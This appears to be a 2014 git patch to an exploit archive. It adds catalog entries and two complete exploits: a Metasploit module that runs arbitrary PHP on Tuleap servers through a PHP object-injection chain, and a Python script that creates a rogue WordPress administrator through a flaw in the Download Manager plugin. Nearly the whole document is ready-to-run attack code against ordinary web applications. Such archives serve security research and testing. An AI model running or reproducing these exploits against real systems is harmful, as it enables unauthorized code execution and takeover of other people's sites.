From 4353d215d8288c16d92441ab492367a1bc52abb2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 17 Dec 2014 04:52:46 +0000 Subject: [PATCH] Updated 12_17_2014 --- files.csv | 4 +- platforms/php/remote/35545.rb | 102 ++++++++++++++++++ platforms/php/webapps/35533.py | 189 +++++++++++++++++++++++++++++++++ 3 files changed, 294 insertions(+), 1 deletion(-) create mode 100755 platforms/php/remote/35545.rb create mode 100755 platforms/php/webapps/35533.py diff --git a/files.csv b/files.csv index 8c1c4a22b..3d6820f0f 100755 --- a/files.csv +++ b/files.csv @@ -32006,9 +32006,11 @@ id,file,description,date,author,platform,type,port 35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0 +35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0 35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0 35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0 -35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0 +35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0 35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 +35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80 diff --git a/platforms/php/remote/35545.rb b/platforms/php/remote/35545.rb new file mode 100755 index 000000000..c9b484949 --- /dev/null +++ b/platforms/php/remote/35545.rb @@ -0,0 +1,102 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Tuleap PHP Unserialize Code Execution', + 'Description' => %q{ + This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be + abused to allow authenticated users to execute arbitrary code with the permissions of the + web server. The dangerous unserialize() call exists in the 'src/www/project/register.php' + file. The exploit abuses the destructor method from the Jabbex class in order to reach a + call_user_func_array() call in the Jabber class and call the fetchPostActions() method from + the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In + order to work, the target must have the 'sys_create_project_in_one_step' option disabled. + }, + 'License' => MSF_LICENSE, + 'Author' => 'EgiX', + 'References' => + [ + ['CVE', '2014-8791'], + ['OSVDB', '115128'], + ['URL', 'http://karmainsecurity.com/KIS-2014-13'], + ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601'] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Generic (PHP Payload)', {}]], + 'DisclosureDate' => 'Nov 27 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, "The base path to the web application", "/"]), + OptString.new('USERNAME', [true, "The username to authenticate with" ]), + OptString.new('PASSWORD', [true, "The password to authenticate with" ]), + OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]), + Opt::RPORT(443) + ], self.class) + end + + def check + flag = rand_text_alpha(rand(10)+20) + res = exec_php("print #{flag};") + + if res and res.body and res.body.to_s =~ /#{flag}/ + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def do_login() + print_status("#{peer} - Logging in...") + + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'account/login.php'), + 'vars_post' => {'form_loginname' => username, 'form_pw' => password} + }) + + unless res && res.code == 302 + fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") + end + + print_status("#{peer} - Login successful with #{username}:#{password}") + res.get_cookies + end + + def exec_php(php_code) + session_cookies = do_login() + + chain = 'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}' + chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";' + chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";' + chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}' + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'project/register.php'), + 'cookie' => session_cookies, + 'vars_post' => {'data' => chain}, + 'headers' => {'payload' => Rex::Text.encode_base64(php_code)} + }, 3) + end + + def exploit + print_status("#{peer} - Exploiting the PHP object injection...") + exec_php(payload.encoded) + end +end \ No newline at end of file diff --git a/platforms/php/webapps/35533.py b/platforms/php/webapps/35533.py new file mode 100755 index 000000000..e08585f81 --- /dev/null +++ b/platforms/php/webapps/35533.py @@ -0,0 +1,189 @@ +#!/usr/bin/python +# +# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution +# +# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html) +# +# Exploit written by Claudio Viviani +# +# +# 2014-12-03: Discovered vulnerability +# 2014-12-04: Patch released (2.7.5) +# +# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk +# +# -------------------------------------------------------------------- +# +# The vulnerable function is located on "/download-manager/wpdm-core.php" file: +# +# function wpdm_ajax_call_exec() +# { +# if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') { +# if (function_exists($_POST['execute'])) +# call_user_func($_POST['execute'], $_POST); +# else +# echo "function not defined!"; +# die(); +# } +# } +# +# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook). +# wpdm_ajax_call_exec() call functions by call_user_func() through POST data: +# +# if (function_exists($_POST['execute'])) +# call_user_func($_POST['execute'], $_POST); +# else +# ... +# ... +# ... +# +# $_POST data needs to be an array +# +# +# The wordpress function wp_insert_user is perfect: +# +# http://codex.wordpress.org/Function_Reference/wp_insert_user +# +# Description +# +# Insert a user into the database. +# +# Usage +# +# +# +# Parameters +# +# $userdata +# (mixed) (required) An array of user data, stdClass or WP_User object. +# Default: None +# +# +# +# Evil POST Data (Add new Wordpress Administrator): +# +# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator +# +# --------------------------------------------------------------------- +# +# Dork google: index of "wordpress-download" +# +# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6 +# +# Http connection +import urllib, urllib2, socket +# +import sys +# String manipulator +import string, random +# Args management +import optparse + +# Check url +def checkurl(url): + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') + sys.exit(1) + else: + return url + +# Check if file exists and has readable +def checkfile(file): + if not os.path.isfile(file) and not os.access(file, os.R_OK): + print '[X] '+file+' file is missing or not readable' + sys.exit(1) + else: + return file + +def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +banner = """ + ___ ___ __ + | Y .-----.----.--| .-----.----.-----.-----.-----. + |. | | _ | _| _ | _ | _| -__|__ --|__ --| + |. / \ |_____|__| |_____| __|__| |_____|_____|_____| + |: | ______ |__| __ __ + |::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| | + `--- ---' |. | \| _ | | | | | | _ | _ | _ | + |. | |_____|________|__|__|__|_____|___._|_____| + |: 1 / ___ ___ + |::.. . / | Y .---.-.-----.---.-.-----.-----.----. + `------' |. | _ | | _ | _ | -__| _| + |. \_/ |___._|__|__|___._|___ |_____|__| + |: | | |_____| + |::.|:. | + `--- ---' + Wordpress Download Manager + R3m0t3 C0d3 Ex3cut10n + (Add WP Admin) + v2.7.0-2.7.4 + + Written by: + + Claudio Viviani + + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww +""" + +commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", + ) +commandList.add_option('--timeout', action="store", default=10, type="int", + help="[Timeout Value] - Default 10", + ) + +options, remainder = commandList.parse_args() + +# Check args +if not options.target: + print(banner) + commandList.print_help() + sys.exit(1) + +host = checkurl(options.target) +timeout = options.timeout + +print(banner) + +socket.setdefaulttimeout(timeout) + +username = id_generator() +pwd = id_generator() + +body = urllib.urlencode({'action' : 'wpdm_ajax_call', + 'execute' : 'wp_insert_user', + 'user_login' : username, + 'user_pass' : pwd, + 'role' : 'administrator'}) + +headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} + +print "[+] Tryng to connect to: "+host +try: + req = urllib2.Request(host+"/", body, headers) + response = urllib2.urlopen(req) + html = response.read() + + if html == "": + print("[!] Account Added") + print("[!] Location: "+host+"/wp-login.php") + print("[!] Username: "+username) + print("[!] Password: "+pwd) + else: + print("[X] Exploitation Failed :(") + +except urllib2.HTTPError as e: + print("[X] "+str(e)) +except urllib2.URLError as e: + print("[X] Connection Error: "+str(e)) +